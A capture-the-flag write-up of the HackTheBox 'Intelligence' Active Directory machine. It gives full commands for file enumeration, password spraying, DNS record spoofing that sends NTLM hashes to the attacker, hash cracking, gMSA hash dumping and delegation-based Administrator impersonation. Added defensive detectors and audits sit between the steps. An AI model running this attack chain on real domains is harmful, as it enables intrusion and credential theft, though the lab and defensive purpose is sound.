Open ports: 53, 80, 135, 139, 445, 636, 3269, 49692, 49709
echo "10.129.95.154 intelligence.htb dc.intelligence.htb" >> /etc/hosts
Run gobuster in directory mode.
The /documents page returns 403 Forbidden; I tried bypassing it, but that did not work.
No subdomains were found by gobuster.
SMB anonymous login: no shares found.
Continue with port 80.
Found two PDF files.
Translation of the PDF text:
Moreover, every one has his own way. It will never be achieved but achieved by hard work. Let him not seek any great thing. He wants more pain. Let the pain be with the pain, let it not be cut out of the ways. Because the pleasure of labor is the pain of pain. He likes the pain of the way he loves state They are looking for a great deal. He wants to make a great deal of money but gain gain Look for the times that are important and the times that are not. I do not have any further pain. He loves himself so much that he wants to ask. It's a lot of fun. Let him search for himself for a long time. La- Boredom is not followed by pain, but seeks ways to gain it. As his pain is the pain of any kind of pain. In a great way big It takes a lot of hard work to get them. Times will follow neither great manner nor great pain. It will never be great. Anyone who wants to be loved can be loved. I received no great pain He will follow him. As it is, some of his kind are hard at times. Not everyone there is no pain.
Painful as they fall, get some effort. Let him search with pain, and he will not care. I don't really want to go on like this. A great deal of pain, a great deal of gain, a great deal of pain. Some but his very pain is pleasure. Painful times are great times it is very The ways and means he will follow will never be his great will. It is pursued not by the will of the times, but by labor. He likes but the pleasure is with the work times. It will result in a great deal of pain, but it will be a pain in the ass. His pleasure is to be found. Gained, but the pain as they die, they do not die never Whatever the times may be pleasure. Never as a result of pain let anyone seek pain there. Times are painful and painful. I will continue to have a great time. It is a way to never feel pain or pain.
Two possible usernames from the PDFs: William.Lee, Jose.Williams
kerbrute userenum --dc 10.129.95.154 username.txt -d intelligence.htb
kerbrute confirms that both users exist.
GetNPUsers.py intelligence.htb/ -usersfile username.txt -no-pass -request -dc-ip 10.129.95.154
The "do not require Kerberos pre-authentication" flag is not set on either user, so no AS-REP hash is obtained.
According to the earlier PDF, the files are named by date and stored under the /documents folder, so I wrote a Python script to enumerate the files in that folder.
import datetime
import requests

# Walk every day in the range and request the file name the naming scheme predicts.
start_date = datetime.datetime(2020, 1, 1)
end_date = datetime.datetime(2021, 7, 4)
delta = datetime.timedelta(days=1)
current_date = start_date
while current_date <= end_date:
    url = current_date.strftime("http://intelligence.htb/documents/%Y-%m-%d-upload.pdf")
    response = requests.get(url)
    if response.status_code == 200:
        # Only print the URLs that actually exist, so the output can feed wget -i.
        print(url)
    current_date += delta
python3 enumeration.py > output
wget -i output
Download all of them, then convert each one to a text file:
for i in *pdf; do pdftotext $i; done
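From the defender's side, the enumeration above leaves a distinctive trace in the web server's access log: one source requesting /documents/YYYY-MM-DD-upload.pdf for consecutive dates, seconds apart, with a high share of 404s. The following detector is an added example written for this page, not code from the original writeup; it parses constructed combined-format log lines (the attacker address 10.10.14.11 and the 2020 dates are taken from the writeup, everything else is made up) and flags sources whose dated requests are sequential or mostly 404.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample access log in combined log format (not from the box). The
# first source walks dates one day at a time and mostly gets 404s; the second is
# an ordinary visitor.
SAMPLE_LOG = """\
10.10.14.11 - - [04/Jul/2021:10:00:01 +0000] "GET /documents/2020-01-01-upload.pdf HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
10.10.14.11 - - [04/Jul/2021:10:00:01 +0000] "GET /documents/2020-01-02-upload.pdf HTTP/1.1" 200 25893 "-" "python-requests/2.25.1"
10.10.14.11 - - [04/Jul/2021:10:00:02 +0000] "GET /documents/2020-01-03-upload.pdf HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
10.10.14.11 - - [04/Jul/2021:10:00:02 +0000] "GET /documents/2020-01-04-upload.pdf HTTP/1.1" 200 27121 "-" "python-requests/2.25.1"
10.10.14.11 - - [04/Jul/2021:10:00:03 +0000] "GET /documents/2020-01-05-upload.pdf HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
10.10.14.11 - - [04/Jul/2021:10:00:03 +0000] "GET /documents/2020-01-06-upload.pdf HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
192.168.1.50 - - [04/Jul/2021:10:05:00 +0000] "GET /documents/2020-12-15-upload.pdf HTTP/1.1" 200 30111 "-" "Mozilla/5.0"
192.168.1.50 - - [04/Jul/2021:10:06:30 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
DATED_UPLOAD_RE = re.compile(r'^/documents/(\d{4}-\d{2}-\d{2})-upload\.pdf$')


def find_document_enumeration(log_text, min_requests=5, max_span_seconds=60, min_404_ratio=0.4):
    """Group dated /documents/ requests by source and flag sources that walk the
    date space quickly, either in calendar order or with a high 404 ratio."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        dated = DATED_UPLOAD_RE.match(m["path"])
        if not dated:
            continue  # only the date-named upload files matter for this rule
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        file_date = datetime.strptime(dated.group(1), "%Y-%m-%d")
        by_ip[m["ip"]].append((ts, file_date, int(m["status"]), m["ua"]))

    alerts = []
    for ip, reqs in by_ip.items():
        if len(reqs) < min_requests:
            continue
        reqs.sort()
        span = (reqs[-1][0] - reqs[0][0]).total_seconds()
        dates = [r[1] for r in reqs]
        # Count neighbouring requests whose file dates are exactly one day apart.
        sequential = sum(1 for a, b in zip(dates, dates[1:]) if (b - a).days == 1)
        not_found = sum(1 for r in reqs if r[2] == 404)
        if span <= max_span_seconds and (sequential >= len(reqs) // 2
                                         or not_found / len(reqs) >= min_404_ratio):
            alerts.append({
                "ip": ip,
                "requests": len(reqs),
                "not_found": not_found,
                "sequential_dates": sequential,
                "seconds": span,
                "user_agents": sorted({r[3] for r in reqs}),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_document_enumeration(SAMPLE_LOG):
        print(alert)
```

The thresholds are assumptions to tune per site; the point is that a guessable naming scheme plus an unauthenticated directory turns the whole archive into a wordlist, so the fix is access control on /documents (or unguessable names), with this rule as the detection behind it.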
Because there are too many files to read by hand, I searched for sensitive words such as key, pass, and so on.
Finally I found a file that contains the word "password" and whose language differs from all the other downloaded files.
grep -l "pass" *.txt
2020-06-04-upload.txt

┌─[✗]─[root@htb-veom2jynhn]─[/home/b3bop404/Desktop/pdf]
└──╼ #cat 2020-06-04-upload.txt
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
This gives me the credential NewIntelligenceCorpUser9876, but I don't have a valid username to go with it.
In this domain all users are likely named [firstname].[lastname], judging by the earlier kerbrute userenum results, so I extracted every author name from the PDF files.
exiftool *.pdf | grep Creator | tr -d ' ' | awk -F ':' '{print $2}' >> ../userlist
Try a password spray attack with [username]:'NewIntelligenceCorpUser9876'. First confirm the user list:
kerbrute userenum --dc dc.intelligence.htb -d intelligence.htb userlist
All users are valid, so move on to the spray:
kerbrute passwordspray userlist NewIntelligenceCorpUser9876 --dc 10.129.95.154 -d intelligence.htb
It did not work.
Try SMB enumeration instead:
crackmapexec smb intelligence.htb -u userlist -p 'NewIntelligenceCorpUser9876'
Found a valid credential:
Tiffany.Molina:NewIntelligenceCorpUser9876
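The credential above was found by trying one default password against every account, which is the pattern a spray detector on the domain controller's security log is built to catch: one source, many distinct accounts, one or two failures each, inside a short window, followed by a success. The detector below is an added example written for this page, not the author's code; it runs over constructed event records modelled on the fields of Windows events 4771, 4776 and 4624 (the account names William.Lee, Jose.Williams and Tiffany.Molina and the source 10.10.14.11 are from the writeup, the other names, times and the 192.168.1.50 workstation are made up).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of domain-controller security events (not a real log).
# 4771 = Kerberos pre-authentication failed, 4776 = NTLM credential validation,
# 4624 = successful logon. Only the fields the detector needs are kept.
SAMPLE_EVENTS = [
    {"time": "2021-07-04 10:10:00", "event_id": 4771, "user": "William.Lee", "source_ip": "10.10.14.11", "result": "failure"},
    {"time": "2021-07-04 10:10:00", "event_id": 4771, "user": "Jose.Williams", "source_ip": "10.10.14.11", "result": "failure"},
    {"time": "2021-07-04 10:10:01", "event_id": 4771, "user": "Alice.Example", "source_ip": "10.10.14.11", "result": "failure"},
    {"time": "2021-07-04 10:10:01", "event_id": 4771, "user": "Bob.Example", "source_ip": "10.10.14.11", "result": "failure"},
    {"time": "2021-07-04 10:10:02", "event_id": 4771, "user": "Carol.Example", "source_ip": "10.10.14.11", "result": "failure"},
    {"time": "2021-07-04 10:10:02", "event_id": 4624, "user": "Tiffany.Molina", "source_ip": "10.10.14.11", "result": "success"},
    # A user mistyping their own password twice from their workstation: not a spray.
    {"time": "2021-07-04 10:20:00", "event_id": 4776, "user": "Jose.Williams", "source_ip": "192.168.1.50", "result": "failure"},
    {"time": "2021-07-04 10:20:10", "event_id": 4776, "user": "Jose.Williams", "source_ip": "192.168.1.50", "result": "failure"},
    {"time": "2021-07-04 10:20:20", "event_id": 4624, "user": "Jose.Williams", "source_ip": "192.168.1.50", "result": "success"},
]


def detect_password_spray(events, window=timedelta(minutes=10), min_distinct_users=5, max_failures_per_user=2):
    """Flag sources that fail against many distinct accounts with few attempts
    each inside one window (the spray signature), and list any account that then
    logged on successfully from the same source during that window."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["source_ip"]].append((datetime.strptime(e["time"], "%Y-%m-%d %H:%M:%S"), e))

    alerts = []
    for ip, timed in by_ip.items():
        timed.sort(key=lambda t: t[0])
        failures = [(ts, e) for ts, e in timed if e["result"] == "failure"]
        if not failures:
            continue
        start = failures[0][0]
        per_user = defaultdict(int)
        for ts, e in failures:
            if ts - start <= window:
                per_user[e["user"]] += 1
        # Many users, few attempts each: a spray. Few users, many attempts: a
        # brute force against one account, which is a different rule.
        if len(per_user) < min_distinct_users or max(per_user.values()) > max_failures_per_user:
            continue
        compromised = sorted({e["user"] for ts, e in timed
                              if e["result"] == "success" and start <= ts <= start + window})
        alerts.append({
            "source_ip": ip,
            "distinct_users": len(per_user),
            "window_start": start.isoformat(sep=" "),
            "possible_compromise": compromised,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_password_spray(SAMPLE_EVENTS):
        print(alert)
```

The success from the spraying source is the important output: an account that accepted the sprayed password still carries the onboarding default, and the fix is the process one (force a change at first logon, expire unused default-password accounts), with this rule as the alarm.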
smbclient //10.129.95.154/Users -U intelligence.htb/Tiffany.Molina
Retrieved the user flag from the desktop.
smbclient //10.129.95.154/IT -U intelligence.htb/Tiffany.Molina
Found a PowerShell file in the IT share.
downdetector.ps1: Little-endian UTF-16 Unicode text, with CRLF, LF line terminators
Here is its content:
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
The script runs on a schedule and sends a web request to every Active Directory DNS record whose name starts with "web" to check that host's status. Is there a way to spoof such a DNS record and capture the details the request sends?
Googling, I found dnstool.py. This tool can add/remove/modify Service Principal Names on accounts in AD over LDAP.
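The weakness the script exposes is that whoever can create a DNS record named web* decides which host receives the scheduled task's credentials, because -UseDefaultCredentials authenticates to whatever the name resolves to. A defender can audit the DNS partition for exactly that: records created by ordinary users, records pointing outside the corporate address space, and records matching patterns that automated jobs trust. The audit below is an added example written for this page, not code from the writeup or from krbrelayx; it runs over constructed dnsNode-style records (the dc name, the 10.129.95.154 address, the 10.10.16.13 address and the web222 record name are from the writeup, the owners, the corporate range 10.129.0.0/16 and the other records are assumptions).

```python
import ipaddress
from datetime import datetime, timedelta

# Assumptions (constructed, not from the box): the corporate address space and
# the principals that legitimately manage DNS records.
CORPORATE_RANGES = [ipaddress.ip_network("10.129.0.0/16")]
TRUSTED_OWNERS = {"INTELLIGENCE\\Domain Admins", "INTELLIGENCE\\DnsAdmins", "INTELLIGENCE\\DC$"}
# Record-name prefix that an automated job (here the downdetector script) trusts blindly.
MONITORED_PREFIX = "web"

# Constructed sample of dnsNode objects as an LDAP query of the DomainDnsZones
# partition might return them: name, record type, data, object owner, creation time.
SAMPLE_RECORDS = [
    {"name": "dc", "type": "A", "data": "10.129.95.154", "owner": "INTELLIGENCE\\DC$", "created": "2021-04-19 00:00:00"},
    {"name": "web01", "type": "A", "data": "10.129.95.160", "owner": "INTELLIGENCE\\DnsAdmins", "created": "2021-04-20 00:00:00"},
    {"name": "web222", "type": "A", "data": "10.10.16.13", "owner": "INTELLIGENCE\\Tiffany.Molina", "created": "2021-07-04 11:00:00"},
    {"name": "printer", "type": "CNAME", "data": "dc.intelligence.htb.", "owner": "INTELLIGENCE\\Jose.Williams", "created": "2021-05-01 00:00:00"},
]


def audit_dns_records(records, now, recent=timedelta(days=7)):
    """Return one finding per record that an ordinary user owns or that points
    outside the corporate ranges, with the reasons and a severity."""
    findings = []
    for r in records:
        reasons = []
        untrusted_owner = r["owner"] not in TRUSTED_OWNERS
        if untrusted_owner:
            reasons.append("owner is not a DNS administrator or domain controller")
        external = False
        if r["type"] in ("A", "AAAA"):
            addr = ipaddress.ip_address(r["data"])
            external = not any(addr in net for net in CORPORATE_RANGES)
            if external:
                reasons.append("address is outside the corporate ranges")
        if not (untrusted_owner or external):
            continue  # a record an admin created for an internal host is normal
        # Context that raises the priority of a finding.
        if r["name"].lower().startswith(MONITORED_PREFIX):
            reasons.append("name matches the '%s*' pattern an automated job trusts" % MONITORED_PREFIX)
        created = datetime.strptime(r["created"], "%Y-%m-%d %H:%M:%S")
        if now - created <= recent:
            reasons.append("created within the last %d days" % recent.days)
        # Heuristic: a user-created record with two or more aggravating factors is high.
        severity = "high" if untrusted_owner and len(reasons) >= 3 else "medium"
        findings.append({"name": r["name"], "owner": r["owner"], "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_dns_records(SAMPLE_RECORDS, now=datetime(2021, 7, 5)):
        print(f["severity"], f["name"], f["owner"], "; ".join(f["reasons"]))
```

Two fixes go with this audit. In AD-integrated DNS zones, Authenticated Users can create child records by default, which is why a regular domain account could add web222 at all; tightening that permission on the zone removes the primitive. And a health check that only needs to know whether a host answers should not send -UseDefaultCredentials at all, or should at least be pinned to an explicit list of hosts rather than to whatever currently matches web* in DNS.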
git clone https://github.com/dirkjanm/krbrelayx.git
python3 ./dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.129.95.154 -a add -r web111 -d 10.10.14.11 -t A
responder -I tun0
Start the listener and wait for the next scheduled run of the script.
Because I'm using the HTB Pwnbox, port 80 is already occupied by a python2.7 process, so I switched back to my Kali Linux box.
python3 ./dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.129.224.189 -a add -r web222 -d 10.10.16.13 -t A
[HTTP] NTLMv2 Client   : 10.129.224.189
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:b364c80df1ef91e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
Received a hash from the client; throw it into hashcat:
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
Cracked: TedGraves:Mr.Teddy
evil-winrm -i intelligence.htb -u Ted.Graves -p 'Mr.Teddy'
Failed.
Try BloodHound.
/bloodhound.py -d intelligence.htb -u Ted.Graves -p Mr.Teddy -ns 10.129.128.237 -c All
gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb'
svc_int$:::d365e889367ce3e3241b120db1df6e25
svc_int$:aes256-cts-hmac-sha1-96:bdc4e5d502f64ffc7b7044c5a2ca5e41fe784866fcfa548b5b16dfdb73c30d63
svc_int$:aes128-cts-hmac-sha1-96:ce17e93d890939760b64a37bac296dd2
I tried to crack it, but that is not feasible.
Target SPN: WWW/dc.intelligence.htb
getST.py -spn WWW/dc.intelligence.htb intelligence.htb/svc_int -hashes :d365e889367ce3e3241b120db1df6e25 -impersonate Administrator
export KRB5CCNAME=./Administrator.ccache
psexec.py -k -no-pass intelligence.htb/administrator@dc.intelligence.htb
or
wmiexec.py dc.intelligence.htb -k -no-pass
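The privilege escalation chains three directory settings: who may read the gMSA's managed password, a service account allowed to delegate to an SPN on the domain controller, and an administrator account that can be impersonated through that delegation. Together with the earlier pre-authentication check, these are all attribute reads, so a defender can audit them with the same LDAP data. The audit below is an added example written for this page, not the author's code or BloodHound's; it runs over constructed account records (svc_int$, WWW/dc.intelligence.htb, Administrator and Tiffany.Molina are from the writeup; the Helpdesk reader group, the svc_legacy account, the userAccountControl values and the group memberships are assumptions made up for the sample).

```python
# userAccountControl bits (documented values).
DONT_REQ_PREAUTH = 0x400000                # AS-REP can be obtained without a password
NOT_DELEGATED = 0x100000                   # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
NORMAL_ACCOUNT = 0x200
WORKSTATION_TRUST_ACCOUNT = 0x2000

# Assumptions (constructed): the domain controllers and the groups treated as tier 0.
DOMAIN_CONTROLLERS = {"dc.intelligence.htb"}
TIER0_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
PRIVILEGED_GROUPS = TIER0_GROUPS | {"Account Operators", "Backup Operators"}

# Constructed sample of account attributes as an LDAP query would return them.
# gmsaReaders models msDS-GroupMSAMembership (None for accounts that are not gMSAs).
SAMPLE_ACCOUNTS = [
    {"sam": "Administrator", "uac": NORMAL_ACCOUNT, "memberOf": ["Domain Admins"],
     "allowedToDelegateTo": [], "gmsaReaders": None},
    {"sam": "svc_legacy", "uac": NORMAL_ACCOUNT | DONT_REQ_PREAUTH, "memberOf": [],
     "allowedToDelegateTo": [], "gmsaReaders": None},
    {"sam": "Tiffany.Molina", "uac": NORMAL_ACCOUNT, "memberOf": [],
     "allowedToDelegateTo": [], "gmsaReaders": None},
    {"sam": "svc_int$", "uac": WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION, "memberOf": [],
     "allowedToDelegateTo": ["WWW/dc.intelligence.htb"], "gmsaReaders": ["Helpdesk"]},
]


def spn_host(spn):
    """Host part of a service/host[:port] SPN, lower-cased."""
    return spn.split("/", 1)[1].split(":")[0].lower()


def audit_accounts(accounts, domain_controllers=DOMAIN_CONTROLLERS):
    """Return (account, check, severity, detail) tuples for the four conditions
    that make the delegation chain on this page possible."""
    findings = []
    for a in accounts:
        uac = a["uac"]
        if uac & DONT_REQ_PREAUTH:
            findings.append((a["sam"], "no-preauth", "medium",
                             "Kerberos pre-authentication not required; AS-REP roastable"))
        dc_targets = [s for s in a["allowedToDelegateTo"] if spn_host(s) in domain_controllers]
        if dc_targets:
            # Protocol transition lets the account request tickets for any user on its own.
            sev = "critical" if uac & TRUSTED_TO_AUTH_FOR_DELEGATION else "high"
            findings.append((a["sam"], "delegation-to-dc", sev,
                             "constrained delegation to a domain controller SPN: " + ", ".join(dc_targets)))
        if a["gmsaReaders"]:
            # Computer accounts normally read a gMSA password; user groups outside tier 0 should not.
            weak = [p for p in a["gmsaReaders"] if p not in TIER0_GROUPS and not p.endswith("$")]
            if weak:
                findings.append((a["sam"], "gmsa-readers", "high",
                                 "managed password readable by: " + ", ".join(weak)))
        privileged = bool(set(a["memberOf"]) & PRIVILEGED_GROUPS)
        if privileged and not (uac & NOT_DELEGATED) and "Protected Users" not in a["memberOf"]:
            findings.append((a["sam"], "delegatable-admin", "high",
                             "privileged account can be impersonated via delegation"))
    return findings


if __name__ == "__main__":
    for sam, check, severity, detail in audit_accounts(SAMPLE_ACCOUNTS):
        print(severity, sam, check, detail)
```

Breaking any one link stops the chain: restricting the gMSA's readers to the computers that run the service, removing delegation to domain controller SPNs (or at least the protocol-transition bit), and marking administrators as sensitive for delegation or placing them in Protected Users, which prevents their tickets from being obtained through S4U2Proxy.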
Rooted!